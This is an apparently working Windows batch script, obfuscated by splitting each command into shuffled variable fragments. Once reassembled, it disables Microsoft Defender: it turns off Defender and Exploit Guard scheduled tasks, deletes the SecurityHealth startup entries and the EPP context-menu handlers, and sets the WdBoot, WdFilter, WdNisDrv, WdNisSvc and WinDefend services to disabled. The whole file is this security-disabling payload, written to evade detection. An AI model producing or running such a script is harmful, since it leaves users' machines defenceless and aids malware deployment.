%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"acVQsAXvmE%HUMH%able"
%JmAq%"qRedmLsjQU%HUMH%Change /TN"
%JmAq%"NajZUzxFAc%HUMH%Guard MDM "
%JmAq%"UBcCcRKGnq%HUMH%schtasks /"
%JmAq%"fxWhrelNkU%HUMH%ExploitGua"
%JmAq%"ffEdJqzZeg%HUMH%resh" /Dis"
%JmAq%"eMUrGJayQp%HUMH% "Microsof"
%JmAq%"dyBxlaGVnL%HUMH%policy Ref"
%JmAq%"tDSzycYvij%HUMH%t\Windows\"
%JmAq%"OPqUzRrMER%HUMH%rd\Exploit"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"fxWhrelNkU%HUMH%Windows De"
%JmAq%"NajZUzxFAc%HUMH%dows Defen"
%JmAq%"dyBxlaGVnL%HUMH%der Cache "
%JmAq%"qRedmLsjQU%HUMH%Change /TN"
%JmAq%"eMUrGJayQp%HUMH% "Microsof"
%JmAq%"acVQsAXvmE%HUMH%e" /Disabl"
%JmAq%"OPqUzRrMER%HUMH%fender\Win"
%JmAq%"tDSzycYvij%HUMH%t\Windows\"
%JmAq%"WgXdZuxojE%HUMH%e"
%JmAq%"ffEdJqzZeg%HUMH%Maintenanc"
%JmAq%"UBcCcRKGnq%HUMH%schtasks /"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%
%JmAq%"fxWhrelNkU%HUMH%Windows De"
%JmAq%"acVQsAXvmE%HUMH%e"
%JmAq%"dyBxlaGVnL%HUMH%der Cleanu"
%JmAq%"tDSzycYvij%HUMH%t\Windows\"
%JmAq%"ffEdJqzZeg%HUMH%p" /Disabl"
%JmAq%"OPqUzRrMER%HUMH%fender\Win"
%JmAq%"UBcCcRKGnq%HUMH%schtasks /"
%JmAq%"qRedmLsjQU%HUMH%Change /TN"
%JmAq%"eMUrGJayQp%HUMH% "Microsof"
%JmAq%"NajZUzxFAc%HUMH%dows Defen"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"eMUrGJayQp%HUMH% "Microsof"
%JmAq%"tDSzycYvij%HUMH%t\Windows\"
%JmAq%"UBcCcRKGnq%HUMH%schtasks /"
%JmAq%"dyBxlaGVnL%HUMH%der Schedu"
%JmAq%"fxWhrelNkU%HUMH%Windows De"
%JmAq%"acVQsAXvmE%HUMH%/Disable"
%JmAq%"NajZUzxFAc%HUMH%dows Defen"
%JmAq%"OPqUzRrMER%HUMH%fender\Win"
%JmAq%"ffEdJqzZeg%HUMH%led Scan" "
%JmAq%"qRedmLsjQU%HUMH%Change /TN"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"OPqUzRrMER%HUMH%fender\Win"
%JmAq%"ffEdJqzZeg%HUMH%cation" /D"
%JmAq%"qRedmLsjQU%HUMH%Change /TN"
%JmAq%"eMUrGJayQp%HUMH% "Microsof"
%JmAq%"dyBxlaGVnL%HUMH%der Verifi"
%JmAq%"fxWhrelNkU%HUMH%Windows De"
%JmAq%"UBcCcRKGnq%HUMH%schtasks /"
%JmAq%"NajZUzxFAc%HUMH%dows Defen"
%JmAq%"acVQsAXvmE%HUMH%isable"
%JmAq%"tDSzycYvij%HUMH%t\Windows\"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"UBcCcRKGnq%HUMH%cls "
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%reg delete"
%JmAq%"acVQsAXvmE%HUMH%v "Securit"
%JmAq%"tDSzycYvij%HUMH%osoft\Wind"
%JmAq%"qRedmLsjQU%HUMH% "HKLM\Sof"
%JmAq%"fxWhrelNkU%HUMH%ows\Curren"
%JmAq%"OPqUzRrMER%HUMH%tVersion\E"
%JmAq%"dyBxlaGVnL%HUMH%artupAppro"
%JmAq%"WgXdZuxojE%HUMH%yHealth" /"
%JmAq%"eMUrGJayQp%HUMH%tware\Micr"
%JmAq%"ffEdJqzZeg%HUMH%ved\Run" /"
%JmAq%"NajZUzxFAc%HUMH%xplorer\St"
%JmAq%"pmLPkHwmMm%HUMH%f"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%%WgXdZuxojE%%pmLPkHwmMm%
%JmAq%"ffEdJqzZeg%HUMH%th" /f"
%JmAq%"NajZUzxFAc%HUMH%un" /v "Se"
%JmAq%"qRedmLsjQU%HUMH% "HKLM\Sof"
%JmAq%"OPqUzRrMER%HUMH%tVersion\R"
%JmAq%"fxWhrelNkU%HUMH%ows\Curren"
%JmAq%"tDSzycYvij%HUMH%osoft\Wind"
%JmAq%"eMUrGJayQp%HUMH%tware\Micr"
%JmAq%"UBcCcRKGnq%HUMH%reg delete"
%JmAq%"dyBxlaGVnL%HUMH%curityHeal"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%
%JmAq%"UBcCcRKGnq%HUMH%cls"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"fxWhrelNkU%HUMH%ndlers\EPP"
%JmAq%"tDSzycYvij%HUMH%textMenuHa"
%JmAq%"eMUrGJayQp%HUMH%hellex\Con"
%JmAq%"OPqUzRrMER%HUMH%" /f"
%JmAq%"qRedmLsjQU%HUMH% "HKCR\*\s"
%JmAq%"UBcCcRKGnq%HUMH%reg delete"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%
%JmAq%"NajZUzxFAc%HUMH%/f"
%JmAq%"fxWhrelNkU%HUMH%xtMenuHand"
%JmAq%"qRedmLsjQU%HUMH% "HKCR\Dir"
%JmAq%"UBcCcRKGnq%HUMH%reg delete"
%JmAq%"OPqUzRrMER%HUMH%lers\EPP" "
%JmAq%"tDSzycYvij%HUMH%llex\Conte"
%JmAq%"eMUrGJayQp%HUMH%ectory\she"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%
%JmAq%"eMUrGJayQp%HUMH%ve\shellex"
%JmAq%"UBcCcRKGnq%HUMH%reg delete"
%JmAq%"qRedmLsjQU%HUMH% "HKCR\Dri"
%JmAq%"tDSzycYvij%HUMH%\ContextMe"
%JmAq%"OPqUzRrMER%HUMH%\EPP" /f"
%JmAq%"fxWhrelNkU%HUMH%nuHandlers"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%
%JmAq%"UBcCcRKGnq%HUMH%cls"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%"
%UBcCcRKGnq%
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"fxWhrelNkU%HUMH%ervices\Wd"
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%JmAq%"ffEdJqzZeg%HUMH%/d "4" /f"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\S"
%JmAq%"NajZUzxFAc%HUMH%Start" /t "
%JmAq%"dyBxlaGVnL%HUMH%REG_DWORD "
%JmAq%"OPqUzRrMER%HUMH%Boot" /v ""
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%
%JmAq%"NajZUzxFAc%HUMH% "Start" /"
%JmAq%"ffEdJqzZeg%HUMH%D /d "4" /"
%JmAq%"acVQsAXvmE%HUMH%f"
%JmAq%"OPqUzRrMER%HUMH%Filter" /v"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%JmAq%"fxWhrelNkU%HUMH%ervices\Wd"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%JmAq%"dyBxlaGVnL%HUMH%t REG_DWOR"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\S"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"ffEdJqzZeg%HUMH%D /d "4" /"
%JmAq%"OPqUzRrMER%HUMH%NisDrv" /v"
%JmAq%"NajZUzxFAc%HUMH% "Start" /"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\S"
%JmAq%"acVQsAXvmE%HUMH%f"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%JmAq%"dyBxlaGVnL%HUMH%t REG_DWOR"
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%JmAq%"fxWhrelNkU%HUMH%ervices\Wd"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"ffEdJqzZeg%HUMH%D /d "4" /"
%JmAq%"acVQsAXvmE%HUMH%f"
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%JmAq%"NajZUzxFAc%HUMH% "Start" /"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\S"
%JmAq%"dyBxlaGVnL%HUMH%t REG_DWOR"
%JmAq%"OPqUzRrMER%HUMH%NisSvc" /v"
%JmAq%"fxWhrelNkU%HUMH%ervices\Wd"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%
%JmAq%"qRedmLsjQU%HUMH%KLM\System"
%JmAq%"NajZUzxFAc%HUMH%v "Start" "
%JmAq%"OPqUzRrMER%HUMH%nDefend" /"
%JmAq%"fxWhrelNkU%HUMH%ervices\Wi"
%JmAq%"UBcCcRKGnq%HUMH%reg add "H"
%JmAq%"acVQsAXvmE%HUMH%/f"
%JmAq%"eMUrGJayQp%HUMH%\CurrentCo"
%JmAq%"dyBxlaGVnL%HUMH%/t REG_DWO"
%JmAq%"tDSzycYvij%HUMH%ntrolSet\S"
%JmAq%"ffEdJqzZeg%HUMH%RD /d "4" "
%UBcCcRKGnq%%qRedmLsjQU%%eMUrGJayQp%%tDSzycYvij%%fxWhrelNkU%%OPqUzRrMER%%NajZUzxFAc%%dyBxlaGVnL%%ffEdJqzZeg%%acVQsAXvmE%